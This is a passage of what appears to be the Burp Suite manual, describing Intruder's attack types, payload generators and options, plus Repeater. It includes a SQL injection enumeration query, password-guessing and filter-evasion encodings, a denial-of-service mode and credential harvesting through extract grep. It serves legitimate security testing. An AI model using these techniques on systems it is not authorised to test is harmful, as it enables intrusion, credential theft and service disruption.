displayed, and also from the Burp Proxy history, site map tree or table, and from within
an already executing Burp Intruder attack:
The positions of payloads are marked using pairs of characters, which may enclose
portions of the template text between them. When a payload is placed into a particular
position for a given request, the characters for that position, and any text which
appears between them, are replaced with the payload. When a particular position is not
assigned a payload for a given request (this applies only to the "sniper" attack type see below), the characters for that position are simply removed, and any text which
appears between them remains unchanged.
When you send a request from elsewhere within Burp Suite, Burp Intruder makes a
best guess at where you are likely to want to place payloads, and it positions these at
the value of each URL and body parameter, and each cookie. The markers and enclosed
text for each position are automatically highlighted for clarity. You can use the option on
the Intruder menu to control whether payload markers are positioned so as to replace
or append the existing parameter values. Above the request editor, the number of
defined positions and the size of the template text are indicated.
You can also use the buttons on this tab to control the positioning of payload markers:
add - This inserts a single position marker at the cursor position.
clear - This removes all position markers, either from the entire template or
from a selected portion of the template.
auto - This makes a guess as to where it might be useful to position payloads

and inserts position markers accordingly, either for the entire template or for a selected
portion of the template. Any existing markers are removed. This is a useful function to
quickly mark positions suitable for attacking certain common vulnerabilities (such as
SQL injection), but manual positioning is required for more customised attacks.
refresh - This refreshes the colour-coding of the editor, if necessary.
clear - This deletes the entire contents of the editor.

Note that automatic placement of payload positions recognises XML-formatted data
within the currently-selected range of the request template. Some applications send
XML-encapsulated data within a multipart request body, for example:
POST /function HTTP/1.0
Content-Type: multipart/form-data; boundary=weidhwiderfhwiuehwiuehfwerrf
Content-Length: 202
--weidhwiderfhwiuehwiuehfwerrf
Content-Disposition: form-data; name="data"
<data>
<param1>foo</param1>
<param2>bar</param2>
<param3>123</param3>
</data>
--weidhwiderfhwiuehwiuehfwerrf-If you perform auto-placement of payload positions on the entire message, then
Intruder will mark the whole of the XML block as a single insertion point, which is
probably not what you want. Instead, if you manually select the exact XML block, then
the auto-placement function will recognise that the selection contains XML, and will
mark the individual XML parameter values as insertion points.
The "attack type" drop-down menu is used to define a key aspect of the behaviour of
Burp Intruder - the way in which payloads are placed into the specified positions to
form individual requests. The four possible attack types are described below:
sniper - This uses a single set of payloads. It targets each position in turn, and
inserts each payload into that position in turn. Positions which are not targeted during a
given request are not affected - the position markers are removed and any text which
appears between them in the template remains unchanged. This attack type is useful
for testing a number of data fields individually for a common vulnerability (e.g. crosssite scripting). The total number of requests generated in the attack is the product of
the number of positions and the number of payloads in the payload set.
battering ram - This uses a single set of payloads. It iterates through the
payloads, and inserts the same payload into all of the defined positions at once. This
attack type is useful where an attack requires the same input to be inserted in multiple
places within the HTTP request (e.g. a username within the Cookie header and within
the message body). The total number of requests generated in the attack is the number
of payloads in the payload set.
pitchfork - This uses multiple payload sets. There is a different payload set for
each defined position (up to a maximum of 8). The attack iterates through all payload
sets simultaneously, and inserts one payload into each defined position. I.e., the first
request will insert the first payload from payload set 1 into position 1 and the first
payload from payload set 2 into position 2; the second request will insert the second
payload from payload set 1 into position 1 and the second payload from payload set 2
into position 2, etc. This attack type is useful where an attack requires different but
related input to be inserted in multiple places within the HTTP request (e.g. a username
in one data field, and a known ID number corresponding to that username in another
data field). The total number of requests generated by the attack is the number of
payloads in the smallest payload set.
cluster bomb - This uses multiple payload sets. There is a different payload set
for each defined position (up to a maximum of 8). The attack iterates through each
payload set in turn, so that all permutations of payload combinations are tested. I.e., if
there are two payload positions, the attack will place the first payload from payload set
1 into position 1, and iterate through all the payloads in payload set 2 in position 2; it
will then place the second payload from payload set 1 into position 1, and iterate
through all the payloads in payload set 2 in position 2. This attack type is useful where
an attack requires different and unrelated input to be inserted in multiple places within
the HTTP request (e.g. a username in one parameter, and an unknown password in
another parameter). The total number of requests generated by the attack is the
product of the number of payloads in all defined payload sets - this may be extremely
large.
Payloads tab
This tab is used to configure one or more sets of payloads. If the "pitchfork" or "cluster
bomb" attack types are defined (see Positions tab) then a separate payload set must be
configured for each defined payload position (up to a maximum of 8). Use the "payload
set" drop-down menu to select which payload set to configure.
For each payload set, it is possible to define the "source" of payloads to use (e.g. preset
list, character blocks, brute forcer, etc.), and also various additional processing to be
performed on each payload. A large number of payload sources are available within
Burp Intruder. Some of these are highly configurable and provide for a huge variety of
customised attacks. The source for the current payload set is selected using the dropdown menu. Each payload source is explained separately below.
Payload Sources
Preset list
This is the simplest payload source, and configures a preset list of payload items:
The main controls for configuring the list are at the bottom right of the panel. Items can
be added manually using the text box and the "add" button. The "add from list" pulldown menu can be used to add predefined lists of useful payloads, including common
usernames and passwords, strings designed to detect common vulnerabilities such as
SQL injection, etc. The "load." button is used to import items from a text file. The
"paste" button adds a list of items from the clipboard. The "delete" button removes the
selected item, and the "clear" button removes all items from the list.
You can customise the predefined lists of payloads that are accessible on the "add from
list" menu. To do this, select "configure preset payload lists" from the Intruder menu,
and choose your own directory containing payload files. You can use the "copy" button
to copy all of Burp's built-in payload lists into your custom directory, to use alongside
your own payloads lists:
Runtime file
This payload source configures an external text file from which payloads will be read at
runtime. This is useful when a very large list of predefined payloads is needed, to avoid
holding the entire list in memory. One payload is read from each line of the file, hence
payloads may not contain newline characters.
Custom iterator
This payload source provides a powerful way to generate custom permutations of
characters or other items according to a given template. For example, a payroll
application may identify individuals using a personnel number of the form AB/12; you
may need to iterate through all possible personnel numbers to obtain the details of all
individuals.
The custom iterator defines up to 8 different "positions" which are used to generate
permutations. Each position is configured with a list of items, and an optional
"separator" string, which is inserted between that position and the next. In the example
described above, positions 1 and 2 would be configured with the items A - Z, positions
3 and 4 with the items 0 - 9, and position 2 would be set with the separator character /.
When the attack is executed, the custom iterator iterates through each item in each
position, to cover all possible permutations. Hence, in this example, the total number of
payloads is equal to 26 * 26 * 10 * 10.
The "scheme" drop-down menu can be used to select a preconfigured setup for the
custom iterator. These can be used for various standard attacks or modified for
customised attacks. Available schemes include "directory / file . extension", which can
be used to enumerate web content, and "password + digit" which can be used to
generate an extended wordlist for password guessing attacks.
The controls at the bottom right are used to configure the items at each position. They
function in the same way as the controls in thepreset list source. The "clear all" button
removes all configuration from all positions of the custom iterator.
Character substitution
This payload source takes a preset list of payload items, and produces several payloads
from each item by replacing individual characters in the item with different characters,
according to customisable rules. This payload source is useful in password guessing

attacks, e.g. for producing common variations on dictionary words:
The controls at the bottom right are used to configure the list of preset items. They
function in the same way as the controls in the preset list source.
The list of checkboxes on the right is used to configure the substitution rules. When the
attack is executed, the character substitution source works through each of the preset
items in turn. For each item, it generates a number of payloads, to include all
permutations of substituted characters according to the defined rules. For example, for
the first item in the above screenshot, the following payloads will be generated:
aahed
4ahed
a4hed
44hed
aah3d
4ah3d
a4h3d
44h3d
Case substitution
This payload source takes a preset list of payload items, and produces one or more
payloads from each item by adjusting the case of characters within each item. This
payload source may be useful in password guessing attacks, e.g. for producing case
variations on dictionary words.
The checkboxes on the right are used to configure the case substitution rules. The
available rules perform the following functions:
no change - the item is added to the payload set without being modified
to lower case - all letters in the item are converted to lower case, and the
result is added to the payload set
to upper case - all letters in the item are converted to upper case, and the
result is added to the payload set
to Propername - the first letter in the item is converted to upper case, the
subsequent letters are converted to lower case, and the result is added to the payload
set
to ProperName - the first letter in the item is converted to upper case, the
subsequent letters are not changed, and the result is added to the payload set
When the attack is executed, the case substitution source works through each of the
preset items in turn. For each item, it generates a payload for each of the selected case
substitution rules. If the rule results in a new unique payload, it is added to the payload
set (i.e. duplicate payloads are discarded). For example, for the first item in the above
screenshot, the following payloads will be generated:
aahed
AAHED
Aahed
Recursive grep
This payload set works together with the "extract grep" function (which is explained
below). It allows payloads to be generated recursively on the basis of responses to
earlier requests. The "extract grep" function captures a portion of a server response
following a matched regular expression. With "recursive grep" payloads, the captured
text from the previous server response is used as the payload for the subsequent
request.
This can be used for various enumeration tasks. For example, it may be possible to
enumerate the contents of a database via SQL injection by recursively submitting
queries of the form:
union select name from sysobjects where name>'a'
The server's error message discloses the name of the first database object:
Syntax error converting the varchar value 'accounts' to a column of data type int.
The query is then repeated using 'accounts' to identify the next object. This task can be
easily automated using recursive grep payloads to quickly enumerate all of the objects
within the database.
The payload to use in the first request must be manually specified. The payload source
can be configured to stop when duplicate successive recursive grep items are found, as
this usually indicates that the enumeration is complete. Note that because of the nature
of this payload source, attacks which use it cannot use multiple request threads.
Illegal Unicode
This payload source takes a preset list of payload items, and produces a number of
payloads from each item by replacing a specified character within each item with illegal
Unicode-encodings of a specified character. This payload source may be useful in
attempting to circumvent input validation based on pattern-matching, for example
defences against path traversal attacks which match on expected encodings of the ../
and ..\ sequences.
The two text boxes at the top configure the character to be substituted within each
preset item (here *), and the character to be used as the basis for the illegal encodings
(here /). The latter can be specified using the ASCII character itself, or the two-digit
hex code for the character (e.g. 00) - this is useful for specifying non-printable ASCII
characters, such as null.
The controls in the middle configure the types of illegal encodings which will be
generated. These are explained below:
maximum overlong UTF-8 length - The Unicode encoding scheme allows up

to 6 bytes to be used to represent a single character. Basic ASCII characters (0x00 0x7F) are correctly represented using a single byte. However, it is possible to represent
these in the Unicode scheme using more than one byte (i.e. "overlong" encoding). This
drop-down menu is used to specify whether overlong encoding should be used, and if
so to set the maximum size that should be used.
illegal UTF-8 variants - This option is available if a maximum overlong UTF-8

length of 2 bytes or more is selected. When a character is encoded with more than one
byte, the bytes following the first should take the binary form 10xxxxxx, to designate
that they are continuation bytes. However, the most significant bits of the first byte also
identify how many continuation bytes will follow, so Unicode decoding routines may
safely ignore the first 2 bits of continuation bytes. This means that three illegal variants
of each continuation byte are possible, with the binary forms 00xxxxxx, 01xxxxxx and
11xxxxxx. If this option is selected, then the illegal Unicode payload source will
generate 3 additional encodings for each continuation byte.
max permutations - This option is available if a maximum overlong UTF-8

length of 3 bytes or more is selected, and "illegal UTF-8 variants" is selected. If the
"max permutations" option is not selected, then the illegal Unicode payload source will
work through each continuation byte in turn when generating illegal variants; for each
continuation byte, three illegal variants will be generated and the other continuation
bytes will be unchanged. If the "max permutations" option is selected, however, then
the illegal Unicode payload source will generate all permutations of illegal variants for
continuation bytes - i.e. more than one continuation byte will be modified
simultaneously. This feature may be useful in attempting to circumvent advanced
pattern-matching controls on the target system.
illegal hex - This option is always available. When the list of illegally-encoded
items has been generated using overlong encoding and illegal variants of continuation
bytes (if selected), it is possible to modify the hexadecimal encoding of the resultant
byte sequences to confuse certain pattern-matching controls. Hex encoding uses the
characters A - F to represent the decimal values 10 - 15. However, some hex decoders
interpret G as decimal 16, H as decimal 17, etc. So 0x1G may be interpreted as decimal
32. In addition, if illegal hex characters are used in the first position of a two digit hex
code, then the resultant decoding overflows the size of a single byte, and in this case
some hex decoders only use the 8 least significant bits of the resulting number. So
0xG1 may be decoded as decimal 257, which is then interpreted as decimal 1. Each
legal two digit hex code has between 4 and 6 corresponding illegal hex representations
which are interpreted as that same hex code if decoded as described above. If the
"illegal hex" option is selected, then the illegal Unicode payload source will generate all
possible illegal hex encodings of each byte in the list of illegal-encoded items.
max permutations - This option is available if a maximum overlong UTF-8

length of 2 bytes or more is selected, and "illegal hex" is selected. If the "max
permutations" option is not selected, then the illegal Unicode payload source will work
through each byte in turn when generating illegal hex; for each byte, between 4 and 6
illegal hex encodings will be generated and the other bytes will be unchanged. If the
"max permutations" option is selected, however, then the illegal Unicode payload source
will generate all permutations of illegal hex for all bytes - i.e. more than one byte will
be modified simultaneously. This feature may be useful in attempting to circumvent
advanced pattern-matching controls on the target system.
add % prefix - If this option is selected, then the % character will be inserted
before each two digit hex code in the payloads generated.
lower case hex - This option determines whether lower or upper case alphabet
characters will be used in hex codes.
max encodings - This option places a ceiling on the number of illegal encodings
that will be generated. This can be useful if large overlong encodings are being used
and / or max permutations have been selected, as these options may generate huge
numbers of illegal encodings.
When the attack is executed, this payload source iterates through the list of preset
items, and for each preset item replaces all instances of the specified character with
each item in turn in the set of illegal encodings.
Character blocks
This payload source generates character blocks of specific sizes using a given input
string. It can be useful in detecting buffer overflow and other boundary condition
vulnerabilities in software running in a native (unmanaged) context:
The "string" field specifies the input string from which the character blocks will be
generated. The "min" and "max" fields specify the lengths of the smallest and largest
character blocks that may be generated. The "step" field specifies the increment in the
length of each character block.
Numbers
This payload source generates numbers, either sequentially or at random, in a specified
format:
The "from" and "to" fields specify the smallest and largest number that may be
generated. If "sequential" is selected, the numbers start at the value in the "from" field,
and are incremented by the value in the "step" field. If "random" is selected, the "how
many" field specifies the number of numbers to be generated. Numbers can be
generated in decimal or hexadecimal form. If hexadecimal is selected, then the "from",
"to" and "step" fields must contain hexadecimal integers; otherwise they may contain
decimal integers or fractions.
The controls on the right-hand side specify the number format which will be used.
Dates
This payload source generates dates between a specified range, at a specified interval,
in a specified format. This payload source may be useful during data mining (e.g.
trawling an order book for entries placed on different days) or brute forcing (e.g.
guessing the date of birth component of a user's credentials):
The dates generated start with the date specified in the "from" controls, and are
incremented by the interval specified in the "step" controls, up to or including the date
specified in the "to" controls. Several predefined date formats can be selected in the
"format" pull-down menu, or a custom date format can be entered in the text field. The
following examples illustrate the codes that can be used to specify custom date
formats:
Sat
EEEE
Saturday
dd
07
MM
06
MMM
Jun
MMMM
June
yy
03
yyyy
2003
/ . : etc
/ . :
Brute forcer
This payload source generates a set of payloads of specified lengths which contain all
possible permutations of a specified character set.
Null payloads
This payload source generates "null" payloads - i.e. zero-length strings. It can generate
a specified number of null payloads, or continue indefinitely.
This payload source is useful when an attack requires the same request to be made
repeatedly, without any modification to the basic template. To achieve this, a single pair
of position markers should be placed together anywhere in the request template
(see Positions tab). This can be used for a variety of attacks, for example harvesting
cookies for sequencing analysis, application-layer denial-of-service attacks where
requests are repeatedly sent which initiate high-workload tasks on the server, or
keeping alive a session token which is being used in other intermittent tests.
Char frobber
This payload source operates on the existing base value of each payload position, or on
a specified string. It cycles through the base string one character at a time,
incrementing the ASCII code of that character by one.
This payload source is useful when testing which parameter values, or parts of values,
have an effect on the application's response. In particular, it can be useful when testing
which parts of a complex session token are actually being used to track session state. If
modifying the value of an individual character within the session token still causes your
request to be processed within your session, then it is likely that this character in the
token is not actually being used to track your session.
Bit flipper
This payload source operates on the existing base value of each payload position, or on
a specified string. It cycles through the base string one character at a time, flipping
each (specified) bit in turn.
You can configure the bit flipper either to operate on the literal base value, or to treat
the base value as an ASCII hex string. For example, if the base value is "ab" then
operating on the literal string and flipping all bits will result in the following payloads:
`b
cb
eb
ib
qb
Ab
!b
b
ac
a`
af
aj
ar
aB
a"
a
Whereas treating "ab" as an ASCII hex string and flipping all bits will result in the
following payloads:
aa
a9
af
a3
bb
8b
eb
2b
This payload source can be useful in similar situations to the char frobber but where
you need finer-grained control. For example, if session tokens or other parameter
values contain meaningful data encrypted with a block cipher in CBC mode, it may be
possible to change parts of the decrypted data systematically by modifying bits within
the preceding cipher block. In this situation, you can use the bit flipper payload source
to determine the effects of modifying individual bits within the encrypted value, and
understand whether the application may be vulnerable.
Username generator
This payload source takes human names as input, and generates usernames using
various common schemes.
For example, supplying the name "peter weiner" results in up to 115 possible
usernames, as follows:
peterweiner
peter.weiner
weinerpeter
weiner.peter
peter
weiner
peterw
peter.w
wpeter
w.peter
pweiner
p.weiner
weinerp
weiner.p
etc...
This payload source can be useful if you are targeting a particular human user, and you
do not know the username or email address scheme in use within an application.
Payload processing
For each payload set, in addition to the "source" of payloads to use, it is possible to
define various additional processing to be performed on each payload. This processing
is carried out after all manipulation performed by the selected payload source:
The defined rules are executed in sequence, and can be toggled on and off to help
debug any problems with the configuration. The following types of rule are available:
add prefix
add suffix
match/replace
substring (from a specified offset up to a specified length)
reverse substring (as substring, but indexed from the end of the payload)
modify case (same options as for the case substitution payload source)
encode (as URL, HTML, Base64, ASCII hex and constructed strings for various
platforms)
decode (as URL, HTML, Base64 and ASCII hex)
hash
addition of raw payload (this can be useful if you need to include the same
payload in both raw and hashed form)
Finally, you can configure which characters within the resulting payload should be URLencoded for safe transmission within HTTP requests:
It is recommended to use this setting for final URL-encoding, rather than a payload
processing rule, because the payload grep option can be used to check responses for
echoed payloads before the final URL-encoding is applied.
Options tab
This tab contains various configuration options which control the behaviour of individual
attacks.
These options are used to configure the manipulation of HTTP headers in generated
requests.
If the "update Content-Length header" box is checked, then Burp Intruder will add or
update the Content-Length HTTP header in each request, with the correct value for the
length of the HTTP body of that particular request. This feature is usually essential for
attacks which insert variable-length payloads into the body of the template HTTP
request. The HTTP specification, and most web servers, require the correct value for the
length of the HTTP body to be specified using the Content-Length header. If the correct
value is not specified, then the target server may return an error, may respond to an
incomplete request, or may wait indefinitely for further data to be received in the
request.
If "set Connection: close" is checked, then Burp Intruder will add or update the
Connection HTTP header to request that the connection is closed following each
individual request. In some cases (when the server does not itself return a valid
Content-Length or Transfer-Encoding header), this option may allows attacks to be
performed more quickly.
Note: Earlier versions of Burp Intruder contained options here to add a cookie header to
the request, based on the response to a different request. These configurations have
now been removed, and you should use the suite-wide session handling
support instead.
The concurrent threads setting determines whether the attack will launch requests
synchronously in a single thread, or concurrently using multiple threads. Using multiple
threads can rapidly accelerate a large attack, where the main time factor is the latency
between issuing each request and receiving a response. It can be used to test for
concurrent processing vulnerabilities in applications. And it can be used to increase the
effectiveness of application-layer denial-of-service attacks.
The retry settings determine how many times Burp will repeat a request if a network
failure occurs (e.g. the connection is refused or times out), and how long it will wait
between retries.
The throttle settings are used to configure any time delay required between requests. A
fixed delay may be desirable as a stealth precaution, to avoid a performance impact, to
preserve bandwidth or processing power for other activities, or to perform a required
action periodically, such as keeping alive a session token which is being used in other
intermittent tests. A variable delay can be useful to automate the detection of session
timeout values.
The start settings determine whether the attack will begin immediately when launched,
or will begin after a specified delay, or will wait until the "resume" command is selected
(see Results view). This function can be useful if an attack is being configured which will
be executed at some future point, or saved for future use.
The storage settings determine whether the attack will save the contents of individual
requests and responses. Saving requests and responses consumes disk space in your
temporary directory, but enables you to view these in full during an attack, repeat
individual requests if necessary, and send items to other Burp tools.
If the "make unmodified baseline request" option is selected, then in addition to the
configured attack requests, Burp will issue the template request with all payload
positions set to their base values. This request will show as item #0 in the results table.
If the "DoS mode" option is selected, then the attack will issue requests as normal but
will not wait to process any responses received from the server. As soon as each
request is issued, the TCP connection is closed. This function can be used to perform
application-layer denial-of-service attacks against vulnerable applications, by repeatedly
sending requests which initiate high-workload tasks on the server.
If the "store full payloads" option is selected, Burp will store the full payload values for
each result. This option consumes additional memory but may be required if you want
to perform certain actions at runtime, such as modifying payload grep settings, or
reissuing requests with a modified request template.
The "grep" settings are used to configure various pattern-matching based tests to be
performed at runtime on server responses. There are three types of tests:
match grep - This is used to check each server response for specified expressions,
either simple pattern matches or Perl-like regular expressions. For each specified
expression, the attack will include a column in the results table indicating whether a
match was found. This basic feature has a wide variety of uses, for example: in
password guessing attacks, scanning for phrases such as "password incorrect" or "login
successful"; in testing for SQL injection vulnerabilities, scanning for messages
containing "ODBC", "error", etc.
If regular expressions are used as matching expressions, then these may contain
newline characters.
extract grep - This is used to check each server response for specified expressions,
and if present to extract the text immediately following the matched expression (up to
a specified delimiter or maximum length). For each specified expression, the attack will
include a column in the results table containing the text extracted from each server
response. This feature can be used for data mining, where access has been gained to a
web page containing useful information, and an automated means of extracting this
information is required. For example, if you have gained access to a user administration
page, which is used to access or update the account information of the user whose ID is
specified in the URL query string, then you can execute an attack which iterates
through user IDs and extracts the username and password of each user.
If the same matching expression is added multiple times in succession, then each
server response will be searched for multiple occurrences of that expression, and the
text immediately following each occurrence will be captured. This can be useful, e.g.
when an HTML table contains useful information but there are no unique prefixes with
which to automatically pick out each item.
payload grep - This is used to check each server response for the payload string(s)
which were used in the corresponding request. This feature is useful in detecting crosssite scripting and other response injection vulnerabilities, which can arise when user
input is dynamically inserted into the application's response.
If the "match against pre-encoded payloads" option is selected, then responses are
searched for the raw form of each payload string before any encoding was applied
(see Payload processing). Setting this option is normally desirable - for example, if you
use XSS test payloads containing typographical characters, these will typically need to
be URL-encoded in the payload processing options, but will appear in responses in their
pre-encoded form if the application is vulnerable.
The redirect settings control whether Burp Intruder will follow HTTP redirects (i.e. those
with a 3xx status code and a Location header containing a new URL) when performing
an attack. If configured to follow redirects, then when a redirect is received Intruder will
request the redirection URL (following up to 10 redirections if necessary), and record
the details of the subsequent response within the results. A column in the results table
will indicate whether a redirect was followed for each individual result. You can
configure whether to follow only on-site (i.e. same protocol, host and port) redirects,
only in-scope (defined in Target tab) redirects, or to follow all redirects.
The option to follow redirects is often useful when an application returns a 3xx response
to various kinds of input, with the more interesting features of the application's
processing of your request being returned when the redirection target is requested. For
example, when fuzzing for common vulnerabilities, the application may frequently
return a redirect to an error page - this page may contain useful information about the
nature of the error which can be used to diagnose bugs like SQL injection.
Note that in some situations it may be necessary to use only a single-threaded attack
when redirects are being followed, for example if the application stores within the
session the information which is returned by the next request to the redirection target.
Note also that automatically following redirects may sometimes cause problems for your
attack - for example, if the application responds to some malicious requests with a
redirection to the logout page, then following redirects may result in your session being
terminated when it would not otherwise do so.
If the "process cookies in redirects" option is selected, then any cookies set in the 3xx
response will be resubmitted when the redirection target is followed. For example, this
option may be necessary if you are attempting to brute force a login challenge which
always returns a redirection to a page indicating the login result, and a new session is
created in response to each login attempt.
Launching an attack
To create a new attack, use the control panel tabs to set the required configuration,
then select "start attack" from the Intruder menu. To load a saved attack, select "open
saved attack" from the Intruder menu, and choose the required file.
When a new attack is executed, various validation checks are performed on the
specified configuration. This includes verifying that payload position(s) and payload
set(s) are correctly defined, that timing and grep settings are valid, etc. Some failures
generate errors which prevent the attack from executing; others generate warnings
which may be ignored.
Each attack opens in a separate window. This window displays the results of the attack
as they are generated, enables you to modify the attack configuration in real time, and
also contains a number of options for controlling the attack, and saving the results,
server responses and the attack itself.
Note: When modifying the live configuration of a running attack, you should proceed
with caution and consider pausing the attack before making changes.
Results tab
The following is an example of the results view for an attack performing basic content
enumeration on a target website:
This attack uses the sniper attack type (see Positions tab) to make requests for a series
of common names of web directories. For this attack type, the results view displays by
default the number of each request, the payload position used (if more than one is
configured), the payload inserted, the HTTP status code received from the server,
whether or not an error or timeout occurred, and the length of the server's response.
Additional results columns that can be displayed include the "received response" and
"finished response" timers for each request, and any cookies received. Various
configuration options, such as the grep functions, will cause additional columns to
appear in the results view. Columns can be hidden or revealed using the "view" menu.
The set of results can be sorted according to the contents of any results column by
clicking on the relevant header (and reverse-sorted by shift-clicking the header). You
can copy the contents of a column by ctrl-clicking the header [Pro version].
A key part of effectively interpreting the results of an attack is locating interesting or
successful server responses, and identifying the requests which generated these.
Interesting responses can usually be differentiated through at least one of the
following:
a different HTTP status code;
a different length of response;
the presence or absence of certain expressions;
the occurrence of an error or timeout; or
the time taken to receive or complete the response.

For example, in a content discovery exercise, requests for existing resources might
return a "200 OK" response of varying lengths, while requests for nonexistent resources
might return a "404 Not found" response, or a "200 OK" response containing a fixedlength custom error page. Or in a password guessing attack, failed login attempts might
generate a "200 OK" response containing the keywords "login failed", while a successful
login might generate a "302 Object moved" response, or a "200 OK" response of a
different length containing the word "welcome".
Burp Intruder can provide assistance in identifying any of the above differentiators. The
grep functions (see Grep tab) can be used to mark responses containing known
keywords, or to extract interesting information from key parts of the page. In the
results view, results can be sorted by clicking a column header, or reverse sorted by
shift-clicking the header. In the above example, the HTTP status code is the main
differentiator of interesting results, and the results have been sorted to pinpoint these.
You can annotate individual or multiple items, by adding comments and highlights:
column:
cell:
If the attack was configured to store requests and./or responses, then you can use the
preview pane to view these or double-click an individual result to display details of the
request and response. This display provides detailed analysis and rendering of each
HTTP message. The "previous" and "next" buttons can be used to cycle through the set
of results. If the table in the results view has been sorted, then the results will be
displayed in the sequence currently showing in that view.
If the attack is configured to follow redirections, all intermediate responses and

requests are also displayed, alongside the initial request and final response.
You can use the "action" button to send the request or response to other Burp Suite
tools, such as Repeater. You can also right-click any item in the results table to show a
context menu with various options:
You can send the selected item to other tools, add multiple items to the Suite site map,
annotate items with comments and highlights, or mark items to be re-requested. This
option is useful if network errors or other problems have affected some of the results. If
you have modified the base request template or other options during the attack, items
to be re-requested will be rebuilt with the current configuration if possible. So, for
example, if your application session has been terminated part way through an attack,
you can modify the base request template with a new session token, and re-issue any
failed requests so that they are executed within your new session.
At the top of the results table is a filter bar, which you can use to hide certain results,
based on HTTP status code, search terms, and user-applied annotations:
As well as filtering, you can also permanently delete items from the results, by selecting
one or more items in the results table, and choosing "delete" from the context menu.
Results menus
The results view contains several menus with commands for controlling the attack, and
saving the results, server responses and the attack itself. These are described below.
Attack menu
This contains commands to pause, resume, or repeat the attack.
Save menu
attack - This is used to save a copy of the current attack, including results. The
saved file can be loaded for further use from within the Burp Intruder control panel.
results table - This is used to save the results table as a text file. Individual
rows and columns can be selected, or the entire table can be saved. The field delimiter
can also be configured. This function is useful for exporting the results into a
spreadsheet for further analysis, or for saving a single column (such as data mined
using the extract grep function) to be used as an input file for subsequent attacks or
other tools.
server responses - This is used to save the full responses received from the
server to all requests. These can either be saved in individual files (sequentially
numbered), or concatenated in sequence into a single file.
attack configuration - This is used to save the configuration of the currently

executing attack (not the results) enabling you to load that configuration into the main
Intruder control panel to configure the same or a similar attack.
View menu
This contains commands to view or hide each of the available data columns in the
results table (the columns available depend upon the configuration of the current
attack).
Using Burp Repeater

Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests,
and analysing their responses. It is best used in conjunction with the other Burp Suite
tools. For example, you can send a request to Repeater from the target site map, from
the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and
manually adjust the request to fine-tune an attack or probe for vulnerabilities.
When you send a request to Repeater from another tool, that request gets its own tab.
Each tab has its own request and response windows, and its own history. The top half of
the panel allows you to configure the target host and port, and the details of your
request. You can complete this information manually, however when you send a request
from another Burp Suite tool the relevant details are all completed for you:
When you have configured a request, click the "go" button to send it to the server. The
response is displayed in the bottom half of the display. For both requests and
responses, various views of the message are available:
raw - This displays the message in plain text form. At the bottom of the text
pane is a search and highlight function which can be used to quickly locate interesting
strings within the message, such as error messages. An options pop-up on the left of
the search bar lets you control case sensitivity, and whether to use simple text or regex
search.
params - For requests containing parameters (within the URL query string, the
Cookie header, or the message body), this tab analyses the parameters into
name/value pairs and allows these to be easily viewed and modified.
headers - This shows the HTTP headers of the message as name/value pairs,
and also displays any message body in raw form.
hex - This allows direct editing of the raw binary data that make up the
message. Certain types of traffic (e.g. browser requests with MIME-encoded parts)
contain binary content that may be corrupted if modified in the text editor. To modify
this type of message, the hex editor should be used.
HTML / XML - For responses containing content in these formats, this provides
a syntax-colourised view of the message body.
render - For responses containing HTML or image content, this renders the
content in visual form, as it would appear within your browser.
AMF - For requests and responses in Action Message Format, this displays a tree
view of the decoded message. If editable, you can double-click individual nodes in the
tree to modify their values.
viewstate - For requests containing an ASP.NET ViewState parameter, this

deserialises the contents of the ViewState, enabling you to review the data contained
for any sensitive items. It also indicates whether the ViewState MAC option is enabled
(and therefore whether the ViewState can be modified).
Right-clicking on any request or response produces a context menu that can be used to
perform various actions:
find references - [Pro version only] You can use this function to search all of
Burp's tools for HTTP responses which link to the selected item.
discover content - [Pro version only] You can use this function to discover
content and functionality which is not linked from visible content which you can browse
to or spider.
scripting).

You can use the "<" and ">" buttons to browse back and forwards through the request
history for the current tab, and modify and reissue any individual request, as necessary.
Options
The "repeater" menu controls aspects of Burp Repeater's behaviour.
You can create a new blank tab, delete an existing tab, or rename a tab's caption to
help you keep track of your work.
If the "update Content-Length header" box is checked, then Burp Repeater will update
the Content-Length header of each request (or add the header if necessary), with the
correct value for the length of the HTTP body of that particular request. This feature is
useful where the HTTP body has been manually modified, and so may have changed
length. The HTTP specification, and most web servers, require the correct value for the
length of the HTTP body to be specified using the Content-Length header. If the correct
value is not specified, then the target server may return an error, may respond to an
incomplete request, or may wait indefinitely for further data to be received in the
request.
If the "unpack gzip / deflate" box is checked, then Burp Repeater will decompress gzipand deflate-compressed content before displaying it.
The redirect settings control whether Burp Repeater will follow HTTP redirects (i.e.
those with a 3xx status code and a Location header containing a new URL). The
following options are available:
Never - Repeater will not follow any redirects.
On-site only - Repeater will only follow redirects to the same web "site", i.e. to
URLs employing the same host, port and protocol as was used in the original request.
In-scope only - Repeater will only follow to URLs that are within the Suite-wide
target scope (defined in the "target" tab).
Always - Repeater will follow redirects to any URL whatsoever. You should use
this option with caution - occasionally, web applications relay your request parameters
in redirections to third-party web sites, and by following redirects you may
inadvertently attack an application that you do not intend to.
When Repeater receives a redirect that is is configured to follow, it will request the
redirection URL (following up to 10 redirections if necessary, after which it stops so as
to avoid infinite loops). The response from the redirection URL is then displayed in the
response panel. The status message will indicate if a redirection was followed, and if so
how many.
The option to follow redirects is often useful when an application returns a 3xx response
to various kinds of input, with the more interesting features of the application's
processing of your request being returned when the redirection target is requested. For
example, when probing for common vulnerabilities, the application may frequently
return a redirect to an error page - this page may contain useful information about the
nature of the error which can be used to diagnose bugs like SQL injection.
If the "process cookies in redirects" option is selected, then any cookies set in the 3xx
response will be resubmitted if a redirects to the same domain is followed.
Note that when Burp Repeater receives a redirection response which it is not configured
to follow automatically, it will display a "follow redirect" button near to the top of the
Repeater interface. This allows you to manually follow the redirect after viewing it. This
feature is useful for walking through each request and response in a redirection
sequence. New cookies will be processed in these manual redirects if this option has
been set in the "process cookies" configuration described above.
The "action" sub-menu contains the same context-menu items as are available by rightclicking the request or response panels.
Session handling challenges

Some problems commonly encountered when performing any kind of fuzzing or
scanning of web applications are:
The application terminates the session being used for testing, either defensively
or for other reasons, and the remainder of the testing exercise is ineffective.
Some functions use changing tokens that must be supplied with each request
(for example, to prevent request forgery attacks).
Some functions require a series of other requests to be made before the request
being tested, to get the application into a suitable state for it to accept the request
being tested.
All of these problems can also arise when you are testing manually, and resolving them
manually is often tedious, reducing your appetite for further testing.
Burp contains a range of features to help in all of these situations, letting you continue
your manual and automated testing while Burp takes care of the problems for you in
the background. All of the session-related configuration can be found in the "sessions"
tab, within the main "options" tab.
Burp's cookie jar

Burp maintains a cookie jar which tracks the cookies being used in your various
